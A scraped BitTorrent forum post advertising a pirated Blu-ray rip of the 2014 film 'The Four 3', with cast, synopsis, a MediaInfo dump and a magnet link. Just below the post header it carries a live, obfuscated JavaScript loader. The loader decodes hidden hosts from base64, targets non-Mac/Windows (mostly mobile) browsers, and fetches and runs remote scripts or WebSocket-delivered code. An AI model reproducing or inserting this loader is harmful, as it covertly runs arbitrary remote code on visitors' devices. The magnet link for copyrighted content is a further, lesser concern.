四大名捕大结局[国粤语配音/中文字幕].The.Four.3.2014.1080p.BluRay.x265.10bit.DTS.2Audio 7.39GB

版主小s 14天前 158

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDA2OQ==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x6b\x62\x74\x42\x4f\x58\x63\x64\x53\x4e']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxzZGtmai41MS10b3VyLm5ldCxodHRwczovL29zbGRramZsLmNoYYW95aTQuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 四大名捕大结局 / 四大名捕3 / The Four Final Battle
◎年  代 2014
◎产  地 中国大陆 / 中国香港
◎类  别 动作 / 爱情 / 悬疑 / 武侠 / 古装
◎语  言 汉语普通话 / 粤语
◎上映日期 2014-08-22(中国大陆)
◎IMDb链接 https://www.imdb.com/title/tt3919278/
◎豆瓣评分 5.1/10 (54129人评价)
◎豆瓣链接 https://movie.douban.com/subject/10604893/
◎片  长 107分钟
◎导  演 陈嘉上 Gordon Chan (id:1274245)
       秦小珍 Janet Chun (id:1274236)
◎编  剧 陈淑贤 Susan Chan (id:1280439)
       王思敏 Sze Man Wang (id:1324934)
       谭广源 Frankie Tam (id:1328638)
       吕冠南 Koon-Nam Lui (id:1313441)
       陈嘉上 Gordon Chan (id:1274245)
       温瑞安 Ruian Wen (id:1321279)
◎演  员 邓超 Chao Deng (id:1274235)
       刘亦菲 Yifei Liu (id:1049732)
       邹兆龙 Collin Chou (id:1022821)
       郑中基 Ronald Cheng (id:1032940)
       黄秋生 Anthony Wong Chau-Sang (id:1050076)
       江一燕 Yiyan Jiang (id:1274286)
       柳岩 Yan Liu (id:1312846)
       吴秀波 Xiubo Wu (id:1275317)
       邓萃雯 Sheren Tang (id:1160170)
       李子雄 Waise Lee (id:1037662)
       苏有朋 Alec Su (id:1050540)
       于承惠 Chenghui Yu (id:1316257)
       包贝尔 Bei'er Bao (id:1315866)
       向恬冉 Tianran Xiang (id:1336304)
       吴映洁 Gemma Wu (id:1313603)
       刘俊纬 A-Wei (id:1316605)
       曹炳琨 Bingkun Cao (id:1313383)
       李宛真 Yuki Li (id:1351244)
       李立宏 Lihong Li (id:1320458)
       杨振宇 Zhenyu Yang (id:1424278)
       黎耀辉 Yiu-Fai Lai (id:1289265)
       蔡彦菁 Maggie Choy (id:1426247)
       陈迪凯 Water Chan Tik-Hoi (id:1345570)
       何志辉 Brian Ho (id:1310960)
       谷轩昭 Huan-Chiu Ku (id:1289063)

◎标  签 武侠 / 四大名捕 / 古装 / 动作 / 刘亦菲 / 中国 / 邓超 / 2014

◎简  介
  杀害捕神的女杀手在姬摇花(江一燕 饰)的协助下, 利用易容术从六扇门的大牢中逃脱。宋徽宗(苏有朋 饰)为此震怒不已,命令六扇门尽快将其捉拿归案。冷血(邓超 饰)无法坐视不管,执意回到六扇门追查真相,在他的眼中摇花的秘密似乎昭然若揭。与此同时,适逢重阳庙会,宋徽宗以体察民情为名执意微服出巡,群臣劝诫无数,眼睁睁看着皇上出宫,最终宋徽宗突然消失,下落不明。在此期间,冷血遇到了此前决然离去的无情(刘亦菲 饰),两人的关系跌至冰点。为了找到皇帝的下落,冷血和铁手(邹兆龙 饰)、追命(郑中基 饰)相继出动,一连串的纷争搏杀再起……                                    
                                本片根据温瑞安同名武侠小说改编。

◎获奖情况 (共2项)
  第34届香港电影金像奖 (2015)
  最佳动作设计(提名)

  第1届豆瓣电影年度榜单 (2014)
  评分最低的华语电影(提名)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 242151455948213079953085858098501945558 (0xB62CAC8BD69A6476687D18F601F088D6)

  4. Complete name                            : [email protected]COM.mkv

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 7.39 GiB

  8. Duration                                 : 1 h 46 min

  9. Overall bit rate                         : 9 918 kb/s

  10. Movie name                               : The Four 3 2014

  11. Encoded date                             : UTC 2021-10-07 01:38:52

  12. Writing application                      : mkvmerge v57.0.0 ('Till The End') 64-bit

  13. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4

  14. Cover                                    : Yes

  15. Attachments                              : cover.jpg


  16. Video

  17. ID                                       : 1

  18. Format                                   : HEVC

  19. Format/Info                              : High Efficiency Video Coding

  20. Format profile                           : Main [email protected]@Main

  21. Codec ID                                 : V_MPEGH/ISO/HEVC

  22. Duration                                 : 1 h 46 min

  23. Bit rate                                 : 6 870 kb/s

  24. Width                                    : 1 920 pixels

  25. Height                                   : 816 pixels

  26. Display aspect ratio                     : 2.35:1

  27. Frame rate mode                          : Constant

  28. Frame rate                               : 23.976 (24000/1001/53354) FPS

  29. Color space                              : YUV

  30. Chroma subsampling                       : 4:2:0

  31. Bit depth                                : 10 bits

  32. Bits/(Pixel*Frame)                       : 0.183

  33. Stream size                              : 5.12 GiB (69%)

  34. Writing library                          : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  35. Encoding settings                        : rc=crf / crf=17.5000 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.90 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x816 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  36. Default                                  : Yes

  37. Forced                                   : No


  38. Audio #1

  39. ID                                       : 2

  40. Format                                   : DTS

  41. Format/Info                              : Digital Theater Systems

  42. Codec ID                                 : A_DTS

  43. Duration                                 : 1 h 46 min

  44. Bit rate mode                            : Constant

  45. Bit rate                                 : 1 509 kb/s

  46. Channel(s)                               : 6 channels

  47. Channel layout                           : C L R Ls Rs LFE

  48. Sampling rate                            : 48.0 kHz

  49. Frame rate                               : 93.750 FPS (512 SPF)

  50. Bit depth                                : 16 bits

  51. Compression mode                         : Lossy

  52. Stream size                              : 1.12 GiB (15%)

  53. Title                                    : Cantonese

  54. Language                                 : Chinese

  55. Default                                  : Yes

  56. Forced                                   : No


  57. Audio #2

  58. ID                                       : 3

  59. Format                                   : DTS

  60. Format/Info                              : Digital Theater Systems

  61. Codec ID                                 : A_DTS

  62. Duration                                 : 1 h 46 min

  63. Bit rate mode                            : Constant

  64. Bit rate                                 : 1 509 kb/s

  65. Channel(s)                               : 6 channels

  66. Channel layout                           : C L R Ls Rs LFE

  67. Sampling rate                            : 48.0 kHz

  68. Frame rate                               : 93.750 FPS (512 SPF)

  69. Bit depth                                : 16 bits

  70. Compression mode                         : Lossy

  71. Stream size                              : 1.12 GiB (15%)

  72. Title                                    : Mandarin

  73. Language                                 : Chinese

  74. Default                                  : No

  75. Forced                                   : No


  76. Text #1

  77. ID                                       : 4

  78. ID in the original source medium         : 4609 (0x1201)

  79. Format                                   : PGS

  80. Muxing mode                              : zlib

  81. Codec ID                                 : S_HDMV/PGS

  82. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  83. Duration                                 : 1 h 40 min

  84. Bit rate                                 : 20.9 kb/s

  85. Count of elements                        : 2356

  86. Stream size                              : 15.1 MiB (0%)

  87. Title                                    : chs

  88. Language                                 : Chinese

  89. Default                                  : Yes

  90. Forced                                   : No

  91. Original source medium                   : Blu-ray


  92. Text #2

  93. ID                                       : 5

  94. ID in the original source medium         : 4608 (0x1200)

  95. Format                                   : PGS

  96. Muxing mode                              : zlib

  97. Codec ID                                 : S_HDMV/PGS

  98. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  99. Duration                                 : 1 h 40 min

  100. Bit rate                                 : 21.1 kb/s

  101. Count of elements                        : 2356

  102. Stream size                              : 15.2 MiB (0%)

  103. Title                                    : cht

  104. Language                                 : Chinese

  105. Default                                  : No

  106. Forced                                   : No

  107. Original source medium                   : Blu-ray


  108. Text #3

  109. ID                                       : 6

  110. ID in the original source medium         : 4610 (0x1202)

  111. Format                                   : PGS

  112. Muxing mode                              : zlib

  113. Codec ID                                 : S_HDMV/PGS

  114. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  115. Duration                                 : 1 h 40 min

  116. Bit rate                                 : 26.2 kb/s

  117. Count of elements                        : 2364

  118. Stream size                              : 18.9 MiB (0%)

  119. Language                                 : English

  120. Default                                  : No

  121. Forced                                   : No

  122. Original source medium                   : Blu-ray


  123. Menu

  124. 00:00:00.000                             : Chapter 01

  125. 00:07:00.461                             : Chapter 02

  126. 00:20:39.947                             : Chapter 03

  127. 00:27:47.791                             : Chapter 04

  128. 00:35:24.038                             : Chapter 05

  129. 00:44:45.724                             : Chapter 06

  130. 00:52:07.415                             : Chapter 07

  131. 01:03:12.288                             : Chapter 08

  132. 01:09:05.141                             : Chapter 09

  133. 01:18:30.038                             : Chapter 10

  134. 01:29:23.858                             : Chapter 11

  135. 01:36:59.104                             : Chapter 12


TAGS 武侠 动作 悬疑 古装 爱情

磁力链:
  • magnet:?xt=urn:btih:32B8620E13D43E468C0D0A26DC950C592C497377
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回